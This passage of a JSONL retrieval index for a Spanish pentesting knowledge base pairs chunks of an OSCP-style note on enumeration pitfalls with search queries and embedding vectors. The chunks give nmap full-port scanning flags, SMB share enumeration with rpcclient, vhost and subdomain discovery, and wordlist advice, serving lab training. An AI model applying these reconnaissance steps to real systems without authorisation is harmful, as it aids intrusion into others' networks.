-0.01981, -0.04471, -0.04246, 0.03029, 0.06687, 0.07008, 0.02155, 0.02352, 0.09076, 0.00389, -0.09272, -0.04209, -0.12756, 0.0021, -0.02532, -0.02062, 0.01041, 0.06277, -0.01667, 0.0258, 0.02972, -0.1141, -0.04998, 0.12044, -0.02556, 0.04157, -0.10755, 0.07342, 0.00185, -0.02391, 0.05507, -0.00783, 0.05256, -0.02135, -0.04107, 0.01013, -0.03025, -0.10131, 0.06448, -0.04562, -0.01924, -0.06034, 0.06395, -0.04109, -0.05868, -0.01843, -0.01465, 0.00254, -0.059, -0.03662, 0.11894, -0.02327, 0.02217, 0.02404, -0.02985, -0.02085, -0.04468, 0.03855, -0.02476, -0.08855, -0.03149, 0.10764, 0.01135, 0.03935, -0.01608, -0.05084, -0.08806, -0.00716, 0.01966, -0.03534, -0.03589, 0.00077, 0.0527, 0.0692, -0.02266, -0.04695, 0.12305, -0.06939, -0.02634, 0.03104, 0.00692, 0.02639, 0.01299, -0.00551, 0.00679, 0.03117, 0.10006, 0.02372, -0.03527, -0.02956, -0.04745, -0.05672, 0.07117, 0.04886, -0.05494, -0.00533, 0.03133, -0.01343, -0.01731, -0.02068, 0.0449, 0.00274, -0.10184, -0.00252, 0.0034, 0.03157, 0.03212, -0.03499, -0.05405, -0.06025, -0.02992, 0.00813, 0.03353, -0.0277, 0.01438, 0.06923, 0.02943, 0.00722, 0.06926, -0.01337]} +{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Trampas de enumeraciΓ³n\n\n> Donde la gente pierde 4 horas. Anti-rabbit-hole. Conecta con GestiΓ³n del tiempo.", "indexar": "que herramienta sirve para evitar caer en enlaces falsos?", "v": [0.16201, 0.09221, -0.1823, -0.07322, 0.0631, -0.12905, -0.05531, -0.00159, -0.02263, -0.09109, -0.07012, -0.07893, -0.07457, -0.11754, 0.1584, 0.07628, 0.00355, -0.13967, 0.00823, 0.02285, -0.04277, -0.02132, -0.06232, -0.10749, -0.11254, -0.01028, -0.01875, -0.02775, -0.19712, -0.01795, 0.0286, 0.08143, 0.01608, -0.02874, -0.02459, 0.05605, -0.00117, 0.0085, 0.00878, -0.00548, 0.08721, 0.08403, -0.08731, 0.005, -0.13137, 0.03015, -0.09043, -0.02022, 0.07933, 0.14799, -0.05035, -0.12506, -0.11843, 0.01222, -0.12328, -0.17214, 0.19512, -0.03651, 0.01052, -0.12286, -0.06484, 0.0048, -0.02664, 0.00658, -0.01207, -0.01197, 0.02018, -0.07294, -0.04832, 0.00412, -0.0632, 0.0206, 0.06734, -0.02098, -0.10182, -0.04344, 0.07672, -0.00133, 0.04967, -0.01018, 0.0537, -0.03034, 0.06314, 0.03835, -0.02282, -0.05985, 0.05059, 0.01086, -0.06702, -0.14777, -0.00784, 0.18081, 0.03283, -0.06181, -0.02059, -0.04054, 0.05335, -0.08028, -0.00395, 0.02541, 0.14111, -0.0581, -0.04179, 0.06567, -0.0228, 0.0309, -0.00785, -0.0235, -0.02494, 0.00802, 0.0368, 0.01461, -0.0279, -0.01676, -0.00327, 0.08705, 0.04121, -0.0511, -0.00737, -0.04945, -0.0258, -0.06192, -0.04779, 0.01822, -0.07643, 0.06951, 0.01129, 0.0322, 0.03534, -0.01002, -0.08625, -0.00385, -0.08867, -0.02942, -0.04462, -0.05809, 0.06037, -0.14625, -0.02554, -0.044, 0.07033, 0.06257, -0.04753, -0.14654, -0.03019, -0.02345, -8e-05, -0.0279, -0.0285, -0.07004, 0.02037, 0.00417, 0.03514, 0.03798, -0.02973, -0.01678, -0.04192, -0.03867, -0.02652, 0.10477, -0.00026, 0.03538, 0.0635, 0.01988, 0.01945, -0.01898, 0.07297, 0.01745, 0.0415, 0.05211, 0.01788, 0.07984, 0.08016, -0.08477, 0.04043, -0.00164, -0.01785, 0.01323, -0.00365, -0.07471, -0.034, -0.06734, 0.00103, 0.05974, 0.04332, -0.06582, 0.03145, 0.00196, 0.03268, 0.0437, 0.0113, -0.0075, 0.02093, 0.00975, 0.02618, 0.05507, 0.03883, -0.08688, 0.08774, -0.0056, -0.00911, -0.05884, 0.02766, -0.02612, 0.05362, 0.03468, -0.00233, -0.06879, -0.07477, 0.06836, 0.08954, -0.07603, 0.01907, -0.08879, 0.00475, -0.06111, 0.04932, -0.00788, -0.01189, 0.01438, 0.0096, -0.01169, 0.02693, 0.02665, -0.06738, 0.03715, -0.01883, 0.013, 0.00099, -0.00844, 0.00806, -0.04796, -0.01694, -0.03574, 0.00299, -0.09721, 0.07349, 0.02731, -0.05489, -0.02135, 0.00677, 0.00333, 0.0036, -0.07862, 0.0415, -0.00776, -0.03006, -0.04219, 0.06563, -0.12596, -0.01389, -0.0082, 0.05, -0.02913, 0.02972, -0.04442]} +{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Trampas de enumeraciΓ³n\n\n> Donde la gente pierde 4 horas. Anti-rabbit-hole. Conecta con GestiΓ³n del tiempo.", "indexar": "como puedo bloquear las trampas de enumeraciΓ³n automΓ‘ticamente?", "v": [0.25063, 0.1234, -0.15287, -0.07201, 0.01105, 0.12033, 0.0882, 0.05111, -0.16308, 0.02612, -0.04723, -0.03408, 0.07043, 0.04776, 0.03831, 0.10433, -0.07538, -0.0645, 0.09449, -0.02989, 0.08382, -0.19374, -0.03184, 0.01625, -0.02413, -0.10906, -0.11767, 0.01373, -0.22893, -0.10948, -0.07081, 0.00831, 0.16605, -0.10396, 0.03968, 0.05087, 0.01917, -0.02214, 0.08359, 0.07528, 0.047, -0.02345, -0.05538, -0.00356, -0.09375, 0.03356, 0.09969, 0.02253, 0.02917, -0.03168, -0.08559, -0.00362, -0.09858, -0.12837, -0.01692, -0.00576, 0.16977, -0.01956, -0.09965, 0.03337, -0.02871, -0.02729, 0.05601, 0.04342, -0.04168, 0.05185, 0.03276, -0.07024, 0.09257, 0.113, 0.08435, -0.04177, 0.01082, 0.02479, 0.01502, 0.02626, -0.03604, -0.01933, 0.0963, 0.06921, -0.03435, -0.06931, 0.04112, 0.05571, -0.00744, 0.03711, -0.06511, 0.0018, -0.0476, -0.07541, 0.06008, 0.10396, 0.09229, 0.08851, 0.06929, -0.09329, 0.05687, 0.08207, 0.04168, -0.01837, 0.04445, -0.11392, -0.09163, 0.13747, -0.0273, 0.04088, 0.05422, -0.05114, 0.01749, -0.11992, -0.04585, -0.04364, -0.05623, -0.06099, 0.0147, -0.02819, -0.04881, 0.06519, 0.07478, -0.03475, -0.10855, -0.04494, -0.0993, 0.05347, 0.10141, -0.01249, -0.02349, 0.06101, 0.00648, -0.00102, -0.04005, 0.03646, -0.04721, -0.04077, -0.01468, 0.01623, -0.04439, 0.01426, 0.0362, -0.01619, 0.06855, 0.08475, 0.01182, -0.04078, 0.04879, -0.04217, -0.0507, -0.11609, -0.01671, -0.01159, 0.01633, -0.02395, 0.04908, 0.08733, 0.05819, 0.00414, 0.0006, 0.00822, 0.02823, 0.12308, -0.00789, 0.02324, -0.07246, 0.05925, -0.03292, 0.02223, -0.0143, -0.02808, -0.03632, -0.02455, -0.06004, 0.00289, 0.01165, -0.0006, -0.0775, 0.00029, -0.00295, 0.05795, -0.01559, -0.03842, -0.03337, -0.0158, -0.03288, -0.05527, -0.01552, 0.0097, 0.01752, -0.05718, 0.04688, 0.08965, 0.01694, 0.00629, -0.04777, -0.05214, -0.05829, -0.04362, 0.01713, 0.05549, -0.04276, -0.05158, 0.01762, 0.02272, 0.02681, -0.01989, -0.01264, -0.00041, -0.01821, 0.0267, 0.00718, 0.04218, 0.04552, -0.00627, 0.04126, -0.04596, -0.00569, 0.00631, -0.0278, -0.02211, -0.02159, -0.02233, -0.0063, 0.06952, 0.0533, 0.08383, -0.01015, 0.00129, -0.00404, 0.08373, 0.06984, 0.06212, -0.0718, -0.00416, 0.01197, 0.01032, 0.0366, -0.01269, -0.01964, -0.07604, 0.01079, -0.01327, -0.00067, 0.00773, 0.03437, -0.07516, -0.05041, -0.01437, -0.03502, 0.03523, 0.01418, -0.08847, -0.0031, 0.00562, 0.00505, 0.01106, 0.00892, 0.03911]} +{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El catΓ‘logo\n- **Olvidar UDP** β†’ SNMP (161), TFTP, NTP. Ver Puertos olvidados.\n- **Olvidar puertos altos** β†’ `nmap -p- --min-rate=5000`. Ver Puertos olvidados.\n- **Olvidar vhosts/subdominios** β†’ Vhosts y subdominios.\n- **`/etc/hosts` no actualizado** β†’ aΓ±ade el dominio en cuanto aparezca.\n- **Wordlists pequeΓ±as** β†’ `common.txt` es junior; usa `raft-large` / `directory-list-2.3-medium`.", "indexar": "que herramienta sirve para encontrar puertos olvidados", "v": [0.22005, 0.02843, -0.16759, -0.17603, 0.00793, -0.08578, 0.08091, -0.1221, -0.08098, -0.08014, -0.04509, 0.0516, 0.10503, -0.01449, 0.02637, -0.00759, 0.04533, -0.04271, 0.0417, 0.01922, -0.08221, 0.08379, -0.06589, -0.04838, -0.07778, -0.0017, 0.0176, -0.00361, -0.19348, 0.07683, -0.04028, 0.0063, 0.07345, -0.06797, -0.06147, -0.14, 0.0538, 0.02494, 0.00246, 0.0764, 0.15735, 0.09373, -0.03449, 0.01393, 0.06884, -0.09525, -0.05198, 0.01125, 0.07568, 0.09552, -0.03795, -0.13944, -0.13462, -0.01009, 0.0251, -0.09423, 0.15414, -0.02327, -0.01188, -0.12664, -0.12339, 0.04401, -0.00848, -0.10019, 0.00646, -0.0579, -0.01979, 0.04981, -0.07644, 0.03392, -0.08098, 0.01409, 0.05473, -0.00565, -0.03466, -0.08894, 0.07058, 0.08168, 0.02354, 0.0315, 0.07566, -0.06528, -0.07114, -0.08106, -0.01014, -0.0498, -0.00444, 0.05051, 0.03511, -0.11916, 0.05421, 0.05321, -0.04261, 0.06698, -0.04904, 0.03601, 0.03508, 0.01308, 0.01905, 0.04424, 0.17338, 0.02688, -0.03349, 0.0283, -0.02444, 0.00385, -0.01939, -0.01331, -0.03197, 0.03626, 0.17315, 0.01481, 0.09751, -0.02017, -0.00096, 0.11685, 0.03081, -0.11306, 0.01295, -0.02142, 0.09486, -0.03684, -0.0649, -0.05675, -0.05889, 0.04123, 0.02892, 0.07095, 0.0807, -0.06355, 0.05393, -0.04219, -0.08219, -0.03811, -0.03983, -0.02307, 0.0466, -0.09186, -0.07134, 0.01148, -0.01419, 0.09466, -0.0981, -0.08205, -0.0076, 0.03858, 0.11793, 0.03376, -0.01759, -0.07645, -0.00424, -0.02493, 0.0031, 0.00647, -0.04697, 0.00458, 0.07366, -0.00548, -0.11329, 0.01645, -0.0677, -0.03205, -0.014, 0.01424, 0.08703, -0.05659, 0.00478, 0.05607, 0.07806, 0.03875, 0.04436, 0.03543, 0.00623, -0.09076, -0.06508, -0.03317, -0.04592, -0.03764, -0.03294, -0.02225, -0.06129, 0.01003, -0.09279, 0.01894, 0.00676, -0.14191, 0.04854, -0.12665, 0.00507, 0.04584, 0.02731, -0.06036, 0.01032, -0.04274, 0.0051, 0.0394, 0.01435, -0.02151, 0.02431, -0.04517, 0.00054, 0.02617, 0.01941, -0.01387, 0.0285, 0.06148, -0.04824, 0.00556, -0.03028, 0.0404, -0.02945, -0.00271, -0.01295, -0.026, -0.00987, -0.01394, -0.04595, 0.04778, 0.00934, 0.04569, -0.05921, -0.02049, -0.01641, 0.05223, -0.01309, 0.05734, 0.02686, 0.03587, -0.02216, -0.01819, 0.0268, -0.04263, -0.04725, -0.02049, 0.00578, -0.02174, -0.01336, -0.02248, -0.03628, 0.02068, -0.00365, -0.03247, 0.01744, -0.0007, -0.01509, -0.0796, 0.03165, -0.02383, -0.01195, -0.03352, -0.02458, 0.01678, 0.06856, -0.00886, 0.02822, -0.07939]} +{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El catΓ‘logo\n- **Olvidar UDP** β†’ SNMP (161), TFTP, NTP. Ver Puertos olvidados.\n- **Olvidar puertos altos** β†’ `nmap -p- --min-rate=5000`. Ver Puertos olvidados.\n- **Olvidar vhosts/subdominios** β†’ Vhosts y subdominios.\n- **`/etc/hosts` no actualizado** β†’ aΓ±ade el dominio en cuanto aparezca.\n- **Wordlists pequeΓ±as** β†’ `common.txt` es junior; usa `raft-large` / `directory-list-2.3-medium`.", "indexar": "cual programa detecta subdominios o vhosts que no aparecen en el DNS", "v": [-0.12112, 0.00752, -0.039, -0.12475, 0.05457, 0.02629, -0.06374, -0.05833, -0.07352, 0.02415, -0.027, -0.17757, -0.15861, -0.19913, -0.05608, -0.13337, 0.1787, -0.01532, 0.01561, 0.04513, -0.16901, -0.07996, -0.04811, 0.02488, 0.05298, -0.0904, -0.07291, 0.01764, -0.09364, 0.02177, 0.0776, -0.19821, -0.06986, 0.01811, -0.03827, -0.0891, -0.07503, -0.00097, 0.06942, 0.10363, 0.08218, 0.02345, -0.08125, 0.01635, -0.04185, -0.06992, -0.0968, -0.04786, 0.06734, -0.23176, -0.08101, 0.0473, -0.04909, -0.02917, 0.03308, -0.08473, 0.07328, -0.14638, 0.06385, -0.01633, -0.08546, -0.04565, 0.04892, -0.05733, 0.06527, -0.12775, 0.05965, -0.00327, -0.13541, -0.04856, 0.06269, 0.03143, 0.11882, -0.02752, 0.06325, 0.00957, -0.00287, -0.05444, 0.10055, -0.02566, 0.04178, -0.00803, -0.01828, 0.15759, -0.1406, -0.06067, -0.04277, -0.06525, -0.06891, -0.09839, 0.09524, 0.08599, 0.04205, 0.08401, 0.12919, 0.00427, 0.16141, -0.0237, -0.02687, 0.01411, 0.07697, 0.09613, -0.09968, 0.17192, -0.01268, 0.08384, -0.00168, 0.01391, -0.02973, -0.00786, 0.05705, -0.013, -0.10625, -0.04202, -0.07458, -0.00438, 0.02414, 0.04508, 0.03912, -0.03996, -0.08975, -0.04765, -0.05167, 0.02934, 0.01714, 0.01772, -0.00027, -0.00919, 0.00388, -0.01376, 0.02367, -0.02904, -0.01901, -0.05474, -0.04827, -0.0103, -0.00063, -0.05908, 0.0157, -0.00226, 0.01447, 0.05353, 0.06536, 0.04929, 0.04542, -0.0069, 0.0323, -0.06141, -0.05256, 0.06453, 0.00016, 0.03727, -0.00251, -0.01752, -0.07922, -0.01995, 0.01955, -0.00876, -0.07089, 0.07283, -0.02043, -0.03985, 0.00387, -0.03032, -0.00779, 0.01846, -0.03913, 0.01924, 0.05109, 0.04636, -0.02674, 0.057, -0.03588, -0.03517, 0.01791, 0.01523, 0.0062, -0.07238, 0.03676, 0.00062, 0.0201, -0.01213, 0.05541, 0.048, -0.04298, -0.0013, -0.0099, 0.04689, -0.03564, -0.03196, 0.00751, 0.00139, -0.08773, 0.03458, -0.04248, -0.01133, -0.0193, -0.07684, 0.01602, 0.01532, -0.06344, -0.0302, 0.02387, 0.00108, -0.02409, 0.00312, -0.03197, 0.00198, 0.01544, 0.02542, -0.01721, -0.05745, -0.00116, 0.00844, -0.05656, 0.05211, -0.03221, 0.00605, -0.03424, -0.00404, -0.04301, -0.00867, 0.03674, 0.00641, 0.02507, -0.06693, 0.04474, 0.06351, 0.05505, 0.04933, 0.02957, -0.01333, -0.00462, 0.01714, -0.00281, -0.0515, 0.02284, -0.01858, 0.0203, 0.01533, -0.03581, -0.00635, 0.04198, -0.02315, 0.006, -0.02221, -0.00749, -0.0177, 0.00113, 0.02888, -0.00485, 0.0118, 0.03623, -0.05623, 0.05264, 0.0501]} +{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El catΓ‘logo\n- **Olvidar UDP** β†’ SNMP (161), TFTP, NTP. Ver Puertos olvidados.\n- **Olvidar puertos altos** β†’ `nmap -p- --min-rate=5000`. Ver Puertos olvidados.\n- **Olvidar vhosts/subdominios** β†’ Vhosts y subdominios.\n- **`/etc/hosts` no actualizado** β†’ aΓ±ade el dominio en cuanto aparezca.\n- **Wordlists pequeΓ±as** β†’ `common.txt` es junior; usa `raft-large` / `directory-list-2.3-medium`.", "indexar": "como puedo actualizar manualmente la lista de dominios si /etc/hosts no estΓ‘ al dΓ­a", "v": [0.18885, 0.20703, -0.10392, -0.00917, 0.06358, -0.04741, 0.01401, -0.03482, -0.17255, -0.05471, -0.11024, -0.1672, -0.04063, -0.10321, -0.02452, -0.07368, 0.12541, -0.04692, -0.09906, -0.00537, -0.07092, -0.0109, -0.04323, 0.07252, 0.0505, -0.07219, 0.08941, -0.09366, -0.20528, 0.05772, 0.08885, -0.06325, 0.00156, 0.01539, 0.03867, -0.04294, -0.01825, 0.07097, -0.05279, -0.02294, 0.06732, 0.05881, -0.0709, 0.06803, -0.07668, -0.06375, -0.02604, -0.03064, 0.01638, -0.14527, -0.04787, -0.03319, -0.03422, -0.02571, 0.01164, -0.04514, 0.17203, -0.10356, 0.02368, -0.10002, -0.04526, 0.09223, -0.02069, 0.02073, 0.01581, -0.00982, -0.05868, -0.01597, -0.06952, 0.06616, 0.01347, -0.02118, 0.09533, 0.04581, -0.01817, -0.02574, 0.05828, -0.04394, 0.02665, -0.00341, -0.03746, -0.06056, -0.05126, 0.06076, -0.11337, -0.177, -0.06492, -0.08485, -0.0408, -0.09563, 0.11562, -0.00343, -0.00405, -0.04109, 0.06947, -0.01104, 0.11303, -0.00956, -0.00942, -0.02156, 0.00835, 0.11474, -0.0019, 0.12203, 0.08471, 0.04142, 0.06444, -0.0029, 0.03681, -0.04154, -0.0459, -0.0148, -0.08109, -0.03681, -0.03575, 0.0299, -0.07161, -0.04091, -0.02188, -0.02735, -0.13947, -0.12882, 0.00346, 0.00521, 0.04162, -0.00662, -0.00804, 0.06409, -0.0084, -0.05579, -0.04856, 0.01346, -0.00473, -0.04864, -0.0152, 0.09294, -0.02463, 0.0311, -0.02625, 0.0109, -0.00428, 0.12108, 0.01856, -0.02172, 0.10658, -0.07358, -0.02585, -0.11842, -0.06109, -0.00056, -0.01439, 0.03394, 0.00304, 0.11877, 0.04073, 0.05848, -0.01561, -0.07276, -0.01508, 0.08565, -0.00802, -0.07087, -0.07907, 0.00372, -0.06039, 0.00791, 0.02952, 0.03417, 0.0612, 0.04853, -0.04373, 0.07708, -0.09937, -0.03751, 0.005, 0.00186, 0.01189, 0.03611, 0.01027, 0.00329, 0.00652, 0.02646, -0.03934, 0.01421, -0.06476, -0.01385, 0.03268, -0.02202, 0.00814, 0.02351, 0.00884, 0.05894, -0.01141, 0.01443, 0.0151, -0.01242, -0.03018, -0.01872, -0.0553, -0.01793, -0.01401, -0.01246, -0.02527, -0.05754, 0.01393, 0.05689, -0.02756, 0.06661, 0.07532, 0.01364, -0.04782, -0.04189, 0.07656, -0.04055, -0.07024, 0.01195, -0.02806, -0.02419, 0.00106, -0.045, -0.00062, 0.01923, 0.10515, -0.06716, 0.00738, -0.00914, 0.08479, 0.06166, 0.0715, 0.07104, -0.05283, 0.07462, 0.03493, -0.06932, 0.09427, 0.04503, 0.04036, -0.03578, -0.03756, 0.02698, 0.02342, 0.06337, -0.00822, -0.07173, -0.01824, -0.06599, -0.07233, -0.00415, 0.01884, -0.07465, -0.0524, 0.03409, 0.03881, -0.03374, 0.02884, -0.04574]} +{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas que cuestan horas (del lab real)\n- **IP del lab dinΓ‘mica**: el 3er octeto cambia al reiniciar (`.55 .65 .67...`). Haz `ip a` **antes** de escanear.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en /24 = 256 \"up\" falsos. Úsalo solo en **1 host**.\n- Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**.\n- **SNMP=UDP/161**, **SMTP=TCP/25**. No confundir.\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` (SMB).\n- Flags placeholder tipo `OS{0123456789abcdef}` = **seΓ±uelo** (grupo/recurso equivocado).\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "quΓ© herramientas sirven para saber si un IP estΓ‘ realmente viva y no es una falsificaciΓ³n?", "v": [-0.08971, 0.02995, -0.27521, -0.02226, 0.08131, -0.19037, -0.12186, -0.09914, -0.02035, -0.14443, 0.11102, -0.12006, 0.0403, -0.04893, 0.0784, 0.07554, 0.00889, -0.12924, 0.1358, -0.02656, -0.04961, 0.0846, -0.10962, -0.07367, -0.11085, 0.08118, -0.06932, 0.05856, -0.21373, 0.01989, -0.03681, -0.02652, -0.01841, -0.0607, -0.16209, -0.05907, 0.01893, 0.02527, 0.04532, 0.09529, 0.13362, -0.012, 0.06101, -0.00185, -0.05979, 0.00188, -0.04931, -0.06515, -0.04382, 0.1074, -0.13151, -0.13488, -0.01592, 0.00493, -0.15722, -0.11652, 0.01468, -0.06691, 0.07096, -0.05725, -0.094, 0.00685, -0.08978, -0.0614, 0.01376, 0.01242, -0.06412, -0.0956, 0.00206, 0.0259, 0.06051, -0.029, -0.04038, 0.06061, -0.06377, -0.12871, 0.00084, -0.06975, 0.09708, -0.03369, 0.04916, 0.07527, -0.05704, 0.00913, 0.0123, -0.02939, 0.07122, -0.06685, 0.03547, -0.12556, -0.07802, 0.15045, 0.01434, -0.00546, 0.03312, 0.03796, 0.11898, -0.05876, -0.01021, 0.01843, 0.0508, -0.00013, -0.0795, 0.04892, -0.01915, 0.071, -0.02498, 0.02198, 0.05171, 0.08845, -0.11434, 0.09435, -0.0892, 0.05957, 0.04966, 0.02691, 0.03627, -0.02308, 0.04177, -0.00464, -0.00657, -0.01627, -0.0408, -0.01083, 0.00784, 0.05521, -0.01009, 0.03329, 0.08442, -0.02409, 0.01104, -0.07018, -0.03086, -0.04119, 0.09413, -0.08767, 0.02748, -0.09663, -0.01076, 0.00224, 0.06703, 0.00519, -0.07609, -0.05837, 0.01567, -0.05341, -0.05517, -0.07405, 0.00687, -0.03941, -0.01425, 0.00599, 0.0829, 0.04373, -0.01383, 0.02113, -0.04395, -0.03956, -0.03872, 0.001, -0.06143, -0.01132, 0.03887, -0.08766, -0.00254, -0.01954, -0.03922, 0.06055, 0.04771, -0.00662, 0.04957, 0.02711, 0.07207, -0.04152, 0.01149, 0.00415, -0.02509, 0.01379, -0.03064, -0.074, 0.03778, -0.00679, 0.03421, 0.02747, 0.06222, 0.00065, 0.05489, 0.03108, -0.0448, 0.02046, 0.03151, 0.00906, 0.01973, 0.04637, 0.04205, 0.05227, 0.05429, -0.11115, 0.02747, -0.05986, 0.02, -0.05384, 0.00753, 0.02095, 0.02571, -0.01055, -0.07868, -0.07597, -0.02196, 0.03551, 0.0102, -0.01231, -0.01315, -0.09498, -0.03946, -0.00769, 0.01378, 0.03325, 0.03428, -0.03364, 0.01774, -0.01255, -0.01907, 0.02661, -0.03649, 0.03029, -0.03484, 0.00707, 0.01793, -0.01681, -0.00865, 0.02651, -0.01517, 0.02686, -0.0426, -0.01123, 0.02798, 0.03294, -0.01546, -0.04754, -0.02209, 0.01534, -0.00629, -0.04782, 0.00526, 0.0336, -0.02122, -0.03176, -0.01053, -0.06002, -0.03068, -0.02013, 0.00253, 0.031, -0.0025, -0.01801]} +{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas que cuestan horas (del lab real)\n- **IP del lab dinΓ‘mica**: el 3er octeto cambia al reiniciar (`.55 .65 .67...`). Haz `ip a` **antes** de escanear.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en /24 = 256 \"up\" falsos. Úsalo solo en **1 host**.\n- Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**.\n- **SNMP=UDP/161**, **SMTP=TCP/25**. No confundir.\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` (SMB).\n- Flags placeholder tipo `OS{0123456789abcdef}` = **seΓ±uelo** (grupo/recurso equivocado).\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "con quΓ© puedo verificar si un servicio como SMTP o SNMP estΓ‘ activo en el puerto correcto?", "v": [-0.09263, 0.03007, -0.25391, -0.06552, -0.04939, -0.14182, -0.01822, -0.17389, -0.13621, 0.00649, -0.08378, 0.09155, 0.23619, -0.10108, 0.00279, 0.05285, -0.02722, -0.18281, 0.16239, 0.11109, 0.00145, -0.08071, 0.0476, -0.12442, 0.08236, 0.13961, -0.01429, 0.03094, -0.10201, -0.01632, 0.03247, -0.01456, -0.00485, -0.03115, 0.02886, -0.03562, 0.05124, 0.08137, 0.10454, 0.11025, -0.01465, -0.06268, 0.01588, -0.01625, 0.04737, 0.0639, 0.00593, -0.11299, -0.02089, -0.00335, -0.06889, 0.08506, -0.1109, -0.08455, -0.18987, 0.09499, -0.00999, -0.00665, 0.00181, -0.10915, 0.03822, 0.04163, -0.01874, -0.09264, -0.01039, -0.06815, 0.03395, 0.05628, -0.00615, -0.01753, -0.06266, -0.00062, 0.09061, 0.05085, -0.06032, -0.01369, 0.01813, -0.01766, 0.11959, 0.09597, 0.0584, 0.03586, -0.08199, -0.02829, -0.09481, -0.08274, 0.00708, -0.0806, -0.01479, -0.11854, 0.02114, 0.1362, 0.01197, 0.11321, -0.07282, 0.0135, -0.03335, -0.01077, 0.0567, 0.01452, 0.07563, 0.0752, -0.0796, 0.04277, -0.01223, -0.02334, 0.02702, -0.01223, 0.04326, -0.03564, -0.03296, -0.04574, -0.03463, -0.08743, -0.004, -0.01966, -0.08011, -0.11262, 0.00773, 0.01647, -0.01073, -0.07075, -0.02442, -0.00895, 0.00325, 0.02379, 0.0805, 0.05317, 0.11683, 0.03045, -0.00555, -0.02106, -0.08713, -0.10897, -0.00328, -0.07573, -0.00553, -0.03121, 0.00672, -0.01053, -0.01064, 0.03683, 0.00969, -0.03504, 0.05807, 0.04413, -0.03021, -0.04833, -0.08161, 0.04846, 0.04157, 0.01492, -0.04845, 0.05766, 0.0144, 0.03045, 0.06478, -0.08261, -0.00519, 0.07655, -0.01909, -0.04564, 0.007, 0.03149, 0.00955, 0.01228, -0.08005, 0.00268, 0.0647, -0.07211, -0.06186, 0.02002, -0.05352, -0.08266, 0.03673, -0.03898, -0.05053, -0.0042, 0.04222, -0.02497, -0.09673, -0.0025, -0.00539, -0.0349, -0.0444, -0.03693, 0.01617, -0.06112, 0.03531, -0.01655, 0.0344, 0.02608, 0.02348, 0.02318, 0.01958, -0.01193, 0.0092, -0.00038, -0.01331, -0.04077, -0.01783, 0.00863, -0.02439, -0.06663, 0.03902, 0.00697, -0.0419, 0.10085, -0.00491, 0.03412, 0.00192, -0.02566, 0.1192, -0.07747, -0.04185, -0.00688, -0.01172, 0.03929, 0.02157, 0.04674, 0.01383, 0.00666, -0.0082, -0.01396, -0.0193, -0.02767, 0.04156, 0.03236, 0.06563, 0.06627, -0.01262, 0.03149, -0.03387, -0.02552, 0.08103, 0.06412, 0.01395, 0.01811, -0.0057, -0.02738, 0.05381, 0.00601, -0.04278, -0.02499, 0.01649, 0.0347, -0.07756, 0.01427, -0.01951, -0.03612, -0.00684, 0.01384, 0.05679, -0.06941, 0.00737, -0.04698]} +{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas que cuestan horas (del lab real)\n- **IP del lab dinΓ‘mica**: el 3er octeto cambia al reiniciar (`.55 .65 .67...`). Haz `ip a` **antes** de escanear.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en /24 = 256 \"up\" falsos. Úsalo solo en **1 host**.\n- Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**.\n- **SNMP=UDP/161**, **SMTP=TCP/25**. No confundir.\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` (SMB).\n- Flags placeholder tipo `OS{0123456789abcdef}` = **seΓ±uelo** (grupo/recurso equivocado).\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "cual programa me ayuda a enumerar los recursos compartidos sin que el servidor muestre comentarios?", "v": [-0.02164, 0.13708, -0.07214, -0.22048, 0.02106, -0.0598, 0.07576, -0.12606, -0.10305, -0.13589, -0.13763, 0.00969, 0.04258, -0.13636, 0.06338, 0.00503, 0.20171, 0.033, 0.10453, 0.01597, 0.05308, 0.00198, 0.06043, 0.00615, -0.0977, -0.03438, 0.05435, -0.08398, -0.0132, -0.05048, 0.09415, -0.03877, 0.04186, -0.09857, 0.05105, 0.03888, 